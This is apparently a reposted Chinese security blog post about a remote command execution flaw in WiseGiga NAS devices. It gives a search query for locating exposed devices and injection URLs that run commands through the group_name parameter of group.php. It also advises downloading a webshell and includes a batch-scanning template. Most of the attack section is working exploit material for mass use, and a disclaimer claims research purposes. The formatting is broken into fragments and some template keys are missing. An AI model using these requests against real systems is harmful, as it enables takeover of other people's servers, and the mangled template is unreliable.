喜乐元宵·漏洞简介
WiseGiga 是一家销售网络连接存储(NAS )产品的韩国公司。WiseGiga NAS 系统group.php存在任意命令执行漏洞,攻击者可以通过执行任意命令,获取服务器管理权限。
喜乐元宵·漏洞复现
步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~
# 搜索语法
title
=
"WiseGiga"
步骤二:拼接路径如下后进行命令执行,并将结果输出到1.txt文件中...
/admin/
group
.php?memberid=root&cmd=
add
&group_name=d;id>
1.
txt
/admin/
group
.php?memberid=root&cmd=
add
&group_name=d;cat >
1.
txt
/admin/
1.
txt
步骤三:在命令执行处执行命令下载webshell后访问(前提能够出网!!!)
喜乐元宵·批量脚本
id
:
WiseGiga_rce
info
:
name
:
WiseGiga_rce
author
:
lanyue
severity
:
critical
description
:
WiseGiga NAS是一种韩国的“网络存储器”,它是一种专用的数据存储服务器;WiseGiga NAS 系统group.php存在任意命令执行漏洞,攻击者可以通过执行任意命令,获取服务器管理权限。
metadata
:
:
1
:
title="WiseGiga"
verified
:
true
tags
:
rce
requests
:
raw:
|-
GET
/admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt HTTP/1.1
Host
:
{{Hostname}}
|+
GET
/admin/1.txt HTTP/1.1
Host
:
{{Hostname}}
:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
:
true
matchers
:
type: dsl
condition
:
and
dsl
:
'contains((body_2), "uid=") && status_code_2 == 200'
原文始发于微信公众号(揽月安全团队):WisGigaNas网络存储器RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论